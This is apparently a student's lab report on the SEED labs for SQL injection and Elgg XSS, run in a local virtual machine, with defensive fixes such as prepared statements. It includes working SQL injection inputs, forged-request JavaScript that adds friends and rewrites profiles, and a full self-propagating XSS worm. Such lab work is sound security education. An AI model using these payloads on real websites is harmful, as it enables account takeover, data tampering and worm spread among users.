# 20212935 2021-2022-2 《网络攻防实践》实践十报告

1.实践目的

学会SQL注入攻击,利用漏洞发起XSS攻击。

2.实践环境

SeedUbuntu

3.实践内容

3.1 SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序,并将其托管www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:

  • 熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。
  • 对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
  • 对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
  • SQL对抗:修复上述SQL注入攻击漏洞。

3.2 SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。

  • 发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
  • 弹窗显示cookie信息:将cookie信息显示。
  • 窃取受害者的cookies:将cookie发送给攻击者。
  • 成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
  • 修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
  • 编写XSS蠕虫。
  • 对抗XSS攻击。

4.实践过程

4.1 SEED SQL注入攻击与防御实验

使用sudo service apache2 start命令启动Apache服务。

4.1.1 熟悉SQL语句

(1)使用mysql -u root -pseedubuntu命令登陆mysql数据库。

(2)进入数据库后,使用use databases;命令查看如下:

然后使用use Users;、show tables;命令查看此数据库的表如下:

(3)使用select * from credential;命令打印出此数据库中的所有成员信息,并且还可以看到| ID | Name | EID | Salary | birth | SSN | Password |等信息。

4.1.2 对SELECT语句的SQL注入攻击

(1)打开 Web应用网站:http://www.SEEDLabSQLInjection.com,使用ctrl+U快捷键查看此页面的源码,可以发现用户在点击提交后,表单将用户输入的信息使用get方法提交到了unsafe_home.php页面进行权限校验。

(2)使用cd /var/www/SQLInjection/命令进入此网址。

(3)使用vim /unsafe_home.php命令找到SQL语句,可以看到此处where部分存在可以进行注入攻击的漏洞。

符号#后的内容为注释内容,那么我们可以利用此漏洞,将name设为Admin‘#,那么#后边的内容就都没了,相当于密码部分直接为空白。
(4)验证此想法:用户名为Admin‘#,密码为空。

(5)发现登陆成功,并且可以看到使用者的Username、Eid、Salary、Birthday、SSN等信息如下。

4.1.3 对UPDATE语句的SQL注入攻击

(1)利用4.1.2中发现的漏洞,使用Alice‘#用户名登陆,发现Alice相应的信息如下:

(2)利用页面上Edit Profile功能,进入修改信息。

(3)使用vim unsafe_edit_backend.php命令找到SQL语句,可以看到这个不能对工资进行修改。

(4)利用上边的漏洞,如果将nikename那一项设为:',salary='20212935'where EID='10000';#(Alice的编号是10000),那么就可以将Alice的工资设为20212935.

保存后得到如下:

4.1.4 SQL对抗:修复上述SQL注入攻击漏洞

在unsafe_edit_backend.php页面中,对UPDATE语句进行预处理。原来的语句:
$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',PhoneNumber='$input_phonenumber' where ID=$id;";
修改为:
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

4.2 SEED XSS跨站脚本攻击实验(Elgg)

4.2.1 发布恶意消息,显示警报窗口

(1)进入到http://www.xsslabelgg.com/profile/alice网址,登陆账户,账户:Alice 密码:seedalice

(2)利用edit profile功能修改页面信息,Brief description位置输入命令后保存。

(3)进入Alice界面后会弹出如下警报窗口:

4.2.2 弹窗显示cookie信息

(1)利用edit profile功能修改页面信息,Brief description位置输入命令后保存

(2)进入界面时可以看到会弹出如下窗口,并将cookie信息显示出来

4.2.3 窃取受害者的cookies

(1)使用本机(192.168.1.140)当作攻击者,令cookies发送到本机的2935端口。

(2)Brief description中输入如下攻击代码

(3)终端处输入nc -l 2935 -v 命令,监听此端口,得到如下cookies信息。

4.2.4 成为受害者的朋友

(1)进入http://www.xsslabelgg.com/profile/boby 网址,访问Boby用户的主页,然后Ctrl+Shift+E进入到此页面的network页面,选择Add friend选项添加此朋友。

(2)添加后会得到如下反馈界面,其中Request URL为http://www.xsslabelgg.com/action/friends/add?friend=45&__elgg_ts=1652762668&__elgg_token=aT1lAXvpdEUpbmNDMh4Rfw

(3)构造如下代码,输入到Alice的About me中并保存。

点击查看代码 
<script type="text/javascript"> window.onload = function () { var Ajax = null; var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts; var token = "&__elgg_token=" + elgg.security.token.__elgg_token; var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token; //发送 Ajax 请求 Ajax = new XMLHttpRequest(); Ajax.open("GET", sendurl, true); Ajax.setRequestHeader("Host", "www.xsslabelgg.com"); Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); Ajax.send(); } </script>

(4)重新进入alice页面,可以看到右侧朋友列表中已经添加Boby为朋友。

4.2.5 修改受害者信息

(1)将以下代码复制到alice的about me中并保存。

点击查看代码 
<script type="text/javascript"> window.onload = function(){ var userName=elgg.session.user.name; var guid="&guid="+elgg.session.user.guid; var ts="&__elgg_ts="+elgg.security.token.__elgg_ts; var token="&__elgg_token="+elgg.security.token.__elgg_token; var content= token + ts + "name=" + userName + "&description=<p>this had been changed by xss attack.</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid; var sendurl = "http://www.xsslabelgg.com/action/profile/edit" alert(content) //FILL IN var samyGuid=44; //FILL IN if(elgg.session.user.guid!=samyGuid) { var Ajax=null; Ajax=new XMLHttpRequest(); Ajax.open("POST",sendurl,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); Ajax.send(content); } } </script>

(2)在boby中点击alice的主页,就会将boby的about me信息替换,此时查看HTTP header live为如下所示

(3)查看boby为:

4.2.6 编写xss蠕虫

(1)选择调用DOM API的方法实现蠕虫感染。
(2)将以下代码写入到alice的about me中。

点击查看代码 
<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>"; 
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;

        //Construct the content of your url.
        var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack  "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        alert(content)

        var samyGuid=44;

        if(elgg.session.user.guid!=samyGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

(3)保存后,提示如下

(4)用boby访问alice后,再返回boby,可以发现boby被感染蠕虫

(5)登陆samy账户,查看boby,再返回到samy,会看到samy也被蠕虫感染。

4.2.7 对抗xss攻击

(1)登陆admin账户(Admin;seedelgg),依次点击如下选择

(2)点击进入Plugins,找到HTML,点击然后关闭。

(3)返回进入alice,可以发现不会被感染。

5.学习中遇到的问题及解决

  • 问题1:实践4.1.1时,无法查看到数据库的表
  • 问题1解决方案:仔细检查,发现在输入命令时没有加“;”,加上后就可以查看到表的内容了。
  • 问题2:实践4.2.1时,跟着操作进入http://www.xsslabelgg.com/profile/alice网址后没有可编辑的选项
  • 问题2解决方案:没有登陆alice的账户… ,登陆后就有了。

6.实践总结

经过本次实践,我对web应用程序安全攻防有了更深的认识,学会了如何利用SQL做注入攻击,用XSS漏洞做攻击。但本次实践中一些需要写程序的内容,我还不太会,要多加强这方面的学习。

posted @ 2022-05-17 14:30  dou嘚嘚嘚  阅读(90)  评论(0编辑  收藏  举报